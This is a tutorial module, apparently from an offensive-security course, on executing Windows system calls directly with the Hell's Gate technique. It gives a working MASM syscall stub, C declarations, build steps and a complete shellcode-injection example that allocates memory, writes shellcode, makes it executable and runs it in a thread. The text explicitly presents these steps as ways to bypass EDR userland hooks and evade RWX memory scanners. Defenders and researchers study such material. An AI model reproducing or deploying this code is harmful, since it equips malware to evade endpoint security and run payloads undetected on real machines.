Difficulty: Intermediate

Module 6: Direct Syscall Execution

You have the number. Now invoke the gate.

Putting It All Together

In the previous module, we resolved SSNs from ntdll stubs. Now we use those SSNs to execute system calls directly, without ever calling through ntdll.dll. This module covers the Hell's Gate assembly stub, how the SSN is set dynamically at runtime, the calling convention bridge between C and the ASM stub, and a complete working example.

The Hell's Gate Assembly Stub

Hell's Gate uses a small assembly function that serves as a reusable syscall trampoline. The SSN is set before calling this stub, and the stub simply moves it into EAX and executes syscall:

ASM; Hell's Gate ASM stub (hellsgate.asm - MASM syntax)
; This file defines two functions:
;   HellsGate  - stores the SSN for the next syscall
;   HellDescent - executes the syscall with the stored SSN

.data
    wSystemCall DWORD 0h    ; Global variable to hold the current SSN

.code

; HellsGate: Set the SSN for the next syscall
; Param: WORD wSSN (passed in ECX on x64)
HellsGate PROC
    mov wSystemCall, 000h   ; Zero the SSN (clean state)
    mov wSystemCall, ecx    ; Store the SSN in the global variable
    ret
HellsGate ENDP

; HellDescent: Execute the syscall
; Params: Same as the target Nt* function (passed in RCX, RDX, R8, R9, stack)
HellDescent PROC
    mov r10, rcx            ; Save 1st param (syscall clobbers RCX)
    mov eax, wSystemCall    ; Load the SSN from our global variable
    syscall                 ; Ring 3 -> Ring 0
    ret                     ; Return NTSTATUS in RAX
HellDescent ENDP

END

Two-Step Invocation

Hell's Gate uses a two-function pattern: first call HellsGate(ssn) to set the syscall number, then call HellDescent(params...) to execute the syscall. This design means the SSN is stored in a global variable between the two calls. The alternative (passing the SSN as an extra parameter to a single function) would shift all the real parameters and break the calling convention alignment. The two-step approach keeps the parameter layout identical to the original Nt* function signature.

C Function Declarations

To call the assembly functions from C, Hell's Gate declares them as external functions with the appropriate signatures:

C// External declarations for the ASM stubs (from main.c)
extern VOID HellsGate(WORD wSystemCall);
extern NTSTATUS HellDescent(...);

// The HellDescent function uses varargs (...) because it serves as
// a generic syscall stub. The actual parameters depend on which
// Nt* function you're invoking.

// Usage pattern:
//   1. Call HellsGate(ssn) to set the SSN
//   2. Call HellDescent(param1, param2, ...) with the Nt* function's parameters
//   3. HellDescent returns the NTSTATUS result

The x64 Calling Convention

Understanding the x64 calling convention is essential for direct syscalls. The Windows x64 ABI passes the first four integer/pointer parameters in registers:

ParameterRegisterAfter mov r10, rcx
1st parameterRCXMoved to R10 (kernel reads from R10)
2nd parameterRDXStays in RDX
3rd parameterR8Stays in R8
4th parameterR9Stays in R9
5th+ parametersStackRemain on the stack

When HellDescent is called from C, the compiler sets up registers and stack exactly as if calling the real Nt* function. The assembly stub then does mov r10, rcx (matching what ntdll does) and executes syscall. The kernel sees the same register layout it would see from a normal ntdll call.

Direct Syscall Execution Flow

C code:
HellsGate(ssn)
ASM stores SSN
in global var
C code:
HellDescent(args)
ASM: mov r10,rcx
mov eax,SSN
syscall
Kernel
NTSTATUS

Complete Working Example

Here is how Hell's Gate uses the resolved SSNs to perform a classic shellcode injection sequence. This demonstrates the entire chain from SSN resolution to syscall execution:

C// From main.c - Shellcode execution using resolved syscalls
// (VX_TABLE 'Table' has been populated by GetVxTableEntry calls)

// Step 1: Allocate RW memory for shellcode
PVOID lpAddress = NULL;
SIZE_T sDataSize = sizeof(shellcode);

HellsGate(Table.NtAllocateVirtualMemory.wSystemCall);
NTSTATUS status = HellDescent(
    (HANDLE)-1,          // ProcessHandle: current process (NtCurrentProcess)
    &lpAddress,           // BaseAddress: let the system choose
    0,                    // ZeroBits
    &sDataSize,           // RegionSize: size of shellcode
    MEM_COMMIT | MEM_RESERVE,  // AllocationType
    PAGE_READWRITE        // Protect: RW (not RWX -- safer)
);

// Step 2: Copy shellcode into allocated memory
// (Using VirtualAlloc'd RW memory, simple memcpy)
memcpy(lpAddress, shellcode, sizeof(shellcode));

// Step 3: Change protection to RX (execute + read, no write)
DWORD dwOldProtect = 0;

HellsGate(Table.NtProtectVirtualMemory.wSystemCall);
status = HellDescent(
    (HANDLE)-1,          // ProcessHandle
    &lpAddress,           // BaseAddress
    &sDataSize,           // NumberOfBytesToProtect
    PAGE_EXECUTE_READ,    // NewAccessProtection: RX
    &dwOldProtect         // OldAccessProtection
);

// Step 4: Create a thread to execute the shellcode
HANDLE hThread = NULL;

HellsGate(Table.NtCreateThreadEx.wSystemCall);
status = HellDescent(
    &hThread,             // ThreadHandle (output)
    THREAD_ALL_ACCESS,    // DesiredAccess
    NULL,                 // ObjectAttributes
    (HANDLE)-1,           // ProcessHandle: current process
    lpAddress,            // StartRoutine: shellcode address
    NULL,                 // Argument
    FALSE,                // CreateFlags: not suspended
    0,                    // ZeroBits
    0,                    // StackSize
    0,                    // MaximumStackSize
    NULL                  // AttributeList
);

// Step 5: Wait for the thread to finish
LARGE_INTEGER Timeout = { 0 };

HellsGate(Table.NtWaitForSingleObject.wSystemCall);
status = HellDescent(
    hThread,              // Handle
    FALSE,                // Alertable
    NULL                  // Timeout (NULL = infinite)
);

What EDR Hooks Miss

In this execution flow, NtAllocateVirtualMemory, NtProtectVirtualMemory, NtCreateThreadEx, and NtWaitForSingleObject are never called through ntdll.dll. The EDR's inline hooks on those functions are completely bypassed. The kernel receives and processes the syscalls normally, but the EDR's userland hooks never fire because execution never passes through the hooked code.

The W+X Strategy

Notice the two-step memory permission approach in the example above: first allocate as RW (writable, for copying shellcode), then change to RX (executable, for running it). This is called W^X (Write XOR Execute) and avoids the RWX red flag that memory scanners look for. At no point is the memory simultaneously writable and executable.

StepPermissionPurpose
AllocatePAGE_READWRITE (RW)Allows writing shellcode into the buffer
CopyRWmemcpy shellcode bytes
ProtectPAGE_EXECUTE_READ (RX)Makes code executable, removes write
ExecuteRXThread starts executing shellcode

Compiling and Linking

The Hell's Gate project requires compiling C code and assembling the MASM file, then linking them together. The assembly file (hellsgate.asm) is compiled with the Microsoft Macro Assembler (ml64) and linked with the C object files:

C// Build process (Visual Studio / MSVC):
// 1. hellsgate.asm  -> ml64.exe /c hellsgate.asm -> hellsgate.obj
// 2. main.c         -> cl.exe /c main.c           -> main.obj
// 3. Link:          -> link.exe main.obj hellsgate.obj -> hellsgate.exe

// In Visual Studio:
// - Add hellsgate.asm to project
// - Right-click -> Properties -> Item Type: "Microsoft Macro Assembler"
// - Build as x64 Release (ASM uses x64-only instructions)

Why Inline Assembly Does Not Work

MSVC does not support inline assembly (__asm) in x64 builds. This is why Hell's Gate uses a separate .asm file with MASM syntax. Some projects use compiler intrinsics or embed raw bytes, but a separate ASM file is the cleanest approach and allows proper debugging.

Pop Quiz: Direct Syscall Execution

Q1: Why does Hell's Gate use two separate functions (HellsGate + HellDescent) instead of one?

If the SSN were passed as an extra parameter to a single function, all the real Nt* parameters would shift by one register position, breaking the calling convention. By setting the SSN via a separate call (HellsGate), the HellDescent call receives parameters in exactly the same registers/stack positions as the original Nt* function.

Q2: In the HellDescent assembly stub, what does mov r10, rcx do?

The syscall instruction stores the return address in RCX, destroying whatever value was there. Since the first function parameter is in RCX (per x64 calling convention), the stub copies it to R10 before executing syscall. The kernel's KiSystemCall64 reads the first parameter from R10.

Q3: Why does the example allocate memory as PAGE_READWRITE first, then change to PAGE_EXECUTE_READ?

Memory that is simultaneously Writable and Executable (RWX) is a strong indicator of malicious activity. The W^X (Write XOR Execute) approach ensures memory is never both writable and executable at the same time, evading scanners like Moneta that flag RWX regions.